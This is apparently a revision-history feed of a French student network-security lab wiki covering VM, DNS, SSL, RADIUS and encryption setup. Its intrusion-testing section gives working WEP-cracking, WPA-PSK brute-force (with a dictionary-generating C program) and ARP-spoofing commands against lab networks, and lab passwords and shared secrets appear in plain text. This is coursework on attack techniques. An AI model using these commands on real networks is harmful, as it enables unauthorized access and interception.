&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration borne wifi ====&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3&lt;br /&gt;
 wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3&lt;br /&gt;
 wifi-ima5sc(config)# aaa group server radius radius_group3&lt;br /&gt;
 wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813&lt;br /&gt;
 wifi-ima5sc(config-server)#exit&lt;br /&gt;
 wifi-ima5sc(config)# dot11 ssid SSID_GROUP3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# mbssid guest-mode&lt;br /&gt;
 wifi-ima5sc(config-ssid)# vlan 303&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication open eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication network-eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication key-management wpa&lt;br /&gt;
 wifi-ima5sc(config-ssid)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Dot11Radio0&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 303 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# mbssid&lt;br /&gt;
 wifi-ima5sc(config-if)#exit&lt;br /&gt;
 wifi-ima5sc(config)# ssid SSID_GROUP3&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Gi0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
 wifi-ima5sc(config)#exit&lt;br /&gt;
 wifi-ima5sc# write&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré notre routeur wifi à l'aide de notre Vlan.&lt;br /&gt;
&lt;br /&gt;
==== Installation freeRadius ====&lt;br /&gt;
&lt;br /&gt;
 Sudo apt install freeradius&lt;br /&gt;
&lt;br /&gt;
dans le fichier&lt;br /&gt;
 /etc/freeradius/3.0/users&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons une ligne dans le but d'ajouter un utilisateur&lt;br /&gt;
 pifou Cleartext-Password := &amp;quot;pasglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/client.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ce paragraphe pour ajouter l'adresse IP du routeur.&lt;br /&gt;
&lt;br /&gt;
 client pra_wifi {&lt;br /&gt;
    ipaddr = 10.60.100.10&lt;br /&gt;
    secret = secret_group14 }&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
&lt;br /&gt;
On ajoute la ligne suivante afin de définir le protocole de communication&lt;br /&gt;
 default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
Et on peut lancer notre freeradius&lt;br /&gt;
 freeradius -X&lt;br /&gt;
&lt;br /&gt;
==== DHCP ====&lt;br /&gt;
Nous devons ensuite configurer notre DHCP afin de donner des adresses lors de la connexion au réseau wifi.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Rsimonin</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54773</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54773"/>
				<updated>2020-12-16T13:20:33Z</updated>
		
		<summary type="html">&lt;p&gt;Rsimonin : /* Sécurisation WiFi par WPA2-EAP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
 Rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
 &lt;br /&gt;
 Modif .cfg pour ajouter disques&lt;br /&gt;
 &lt;br /&gt;
 Transfert fichier /var vers nouvelle partition&lt;br /&gt;
 &lt;br /&gt;
 Ajoute au /etc/fstab les disques&lt;br /&gt;
 &lt;br /&gt;
 Mount -a&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
         IN      AAAA    [ipv6]&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.&lt;br /&gt;
&lt;br /&gt;
Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.&lt;br /&gt;
&lt;br /&gt;
aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,&lt;br /&gt;
&lt;br /&gt;
 sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Nous commencons ainsi le piratage,&lt;br /&gt;
&lt;br /&gt;
attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration borne wifi ====&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3&lt;br /&gt;
 wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3&lt;br /&gt;
 wifi-ima5sc(config)# aaa group server radius radius_group3&lt;br /&gt;
 wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813&lt;br /&gt;
 wifi-ima5sc(config-server)#exit&lt;br /&gt;
 wifi-ima5sc(config)# dot11 ssid SSID_GROUP3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# mbssid guest-mode&lt;br /&gt;
 wifi-ima5sc(config-ssid)# vlan 303&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication open eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication network-eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication key-management wpa&lt;br /&gt;
 wifi-ima5sc(config-ssid)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Dot11Radio0&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 303 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# mbssid&lt;br /&gt;
 wifi-ima5sc(config-if)#exit&lt;br /&gt;
 wifi-ima5sc(config)# ssid SSID_GROUP3&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Gi0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
 wifi-ima5sc(config)#exit&lt;br /&gt;
 wifi-ima5sc# write&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré notre routeur wifi à l'aide de notre Vlan.&lt;br /&gt;
&lt;br /&gt;
==== Installation freeRadius ====&lt;br /&gt;
&lt;br /&gt;
 Sudo apt install freeradius&lt;br /&gt;
&lt;br /&gt;
dans le fichier&lt;br /&gt;
 /etc/freeradius/3.0/users&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons une ligne dans le but d'ajouter un utilisateur&lt;br /&gt;
 pifou Cleartext-Password := &amp;quot;pasglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/client.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ce paragraphe pour ajouter l'adresse IP du routeur.&lt;br /&gt;
&lt;br /&gt;
 client pra_wifi {&lt;br /&gt;
    ipaddr = 10.60.100.10&lt;br /&gt;
    secret = secret_group14 }&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Rsimonin</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54772</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54772"/>
				<updated>2020-12-16T13:11:34Z</updated>
		
		<summary type="html">&lt;p&gt;Rsimonin : /* Sécurisation WiFi par WPA2-EAP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
 Rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
 &lt;br /&gt;
 Modif .cfg pour ajouter disques&lt;br /&gt;
 &lt;br /&gt;
 Transfert fichier /var vers nouvelle partition&lt;br /&gt;
 &lt;br /&gt;
 Ajoute au /etc/fstab les disques&lt;br /&gt;
 &lt;br /&gt;
 Mount -a&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
         IN      AAAA    [ipv6]&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
